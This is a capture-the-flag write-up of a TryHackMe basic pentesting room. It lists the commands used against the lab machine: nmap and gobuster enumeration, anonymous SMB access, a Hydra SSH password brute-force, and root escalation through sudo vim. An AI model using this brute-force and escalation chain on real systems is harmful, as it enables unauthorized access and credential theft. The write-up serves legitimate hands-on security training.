The skills to be tested and needed to solve this room are: webapp, boot2root, and cracking.
This room has been out for over a year, but it is still a great one practice. I was assigned an IP of 10.10.170.205
Shout-out to @ashu for creating this room. Visit https://tryhackme.com and create an account for free to take advantage of this great learning to hack platform.
Answers were masked so you will have to do the steps and see how things work. I don’t want to take away this learning experience from you. The purpose of this write-up is to help you when you feel stuck and to see how other user like me cracked the room.
There are 11 questions to complete the room:
- Deploy the machine and connect to the network
- No answer needed
- Find the services exposed by the machine
- No answer needed
- What is the name of the hidden directory on the web server (enter without “/”)
- d*********t
- Use brute-forcing to find the username and password
- No answer needed
- What is the username?
- j**
- What is the password?
- a*****o
- What service do you use to access the server (answer in abbreviation in all caps)
- S**
- Enumerate the machine to find any vectors for privilege escalation
- No answer needed
- What is the name of the other user you found (all lower case)
- k**
- If you have found another user, what can you do with this information?
- No answer needed
- What is the final password you obtained?
- h******************************************************$
Steps:
- Deploy the machine and connect to the network:
2. Find the services exposed by the machine by using nmap. sudo nmap -sC -sV -oA basic_pentesting 10.10.170.20
- sudo – we have to run the nmap scan with root privileges because “TCP/IP fingerprinting (for OS scan) requires root privileges.”
- -sC – to scan using the default nmap scripts
- -sV – to pull version information of open ports found during the scan
- -oA basic_pentesting – to save the results of the scan to a file named “bounty” and saved in three different formats (normal, XML, and grepable)
- The nmap result above is telling that the website doesn’t have a title, yet it is still a good practice to check it anyway:
- Let’s check the page source if we can find any clues:
3. What is the name of the hidden directory on the web server?
- We will use gobuster to check for hidden directories, and hopefully we will find the clue of a “dev” section that was mentioned from the page source. gobuster dir -u http://10.10.170.205 -w /usr/share/wordlists/dirb/common.txt
- dir – to use directory/file brute-forcing mode
- -u – is the flag to tell gobuster that we are scanning a URL
- -w – is the flag to set the list of possible directory and file names
- Let’s check what is the content of the hidden directory
- Check what’s inside the dev.txt
- Check what’s inside the j.txt
- We need to further enumerate victim machine because we still don’t have a clue of at least the naming convention that is used for username. Let’s enumerate the SMB service. Looking at the nmap result again, it is showing that guest can be used to access SMB:
- Try to connect to SMB service using anonymous authentication. When prompted for a password, it is actually asking for your password and not a victim’s password. smbclient //10.10.170.205/anonymous
- Download the file to your attack machine (Kali) using get so we can open it. get staff.txt
- Go back to your Kali terminal and open the file by using cat. cat staff.txt
4. Use brute-forcing to find the username and password
- Remember the contents of the j.txt we found in the hidden directory? User k** was telling use j** that the password in used is weak. So, it just makes sense to try and brute-force user j** credentials than user k**. We are going to use the tool Hydra. hydra -l j** -P /usr/share/wordlists/rockyou.txt 10.10.170.205 ssh -t 4
- -l – is to use a single username to crack
- -P – this is an uppercase “p” to use a list of passwords to try and match the username
- ssh – to specify what service we are trying to crack. Since SSH is one of the open services that came up from our nmap scan, it just makes sense to try and crack the service
- t 4 – is to specify the number of tasks running to connect in parallel. The default is 16. Hydra recommends using just 4 threads when using it on SSH.
5. What is the username?
6. What is the password?
7. What service do you use to access the server?
8. Enumerate the machine to find any vectors for privilege escalation
- We can check if user j** have any sudo privileges by using sudo. sudo -l
- We can tell that the server we are in is running on Linux, so let’s download LinEnum and use it to enumerate the victim machine of any holes we can use to escalate our privilege. On you Kali machine, wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
- We need to transfer the download script to our victim’s machine. And since we already have a username and password to access the victim machine through SSH, we can take advantage of the SCP service to transfer the file. scp LinEnum.sh j**@10.10.170.205:/home/j**
- LinEnum.sh – is the file we want to transfer
- j**@10.10.170.205 – is the username to authenticate on the victim machine which is the 10.10.170.205
- :/home/j** – is the location where we want the file to be transfered
- Since we cannot write to our intended location, we have to search for a location where user j** has permissions to write to. Let’s do a long listing of all the folders from the root level
- Let’s try and copy LinEnum.sh from our attack machine to the victim machine, and specifically to the /tmp directory
- Confirm that the file is on the victim machine
- Let’s run the script to enumerate ways to escalate our privilege to root
- We can fix the execution permission by doing a chmod. chmod +x LinEnum.sh
- Let’s run LinEnum.sh again. ./LinEnum.sh. There were a lot of information, but this is the one that caught my attention
9. What is the name of the other user you found?
- Both in /etc/passwd and by checking /home, we can see user k**
10. If you have found another user, what can you do with this information?
- The other user we found here is root, and we can utilize root to access user k** file.
11. What is the final password you obtain?
- Since we found from enumeration that we can run vim as root, we can use vim to open the file pass.bak inside user k** directory. /usr/bin/vim.basic /home/kay/pass.bak
- Successfully accessed pass.bak file and see the answer to question number 11
Hope you learned and enjoyed the write-up.
Please don’t forget to subscribe to my page N00b_H@ck3r, click the link and enter your email address.
N00b_H@ck3r 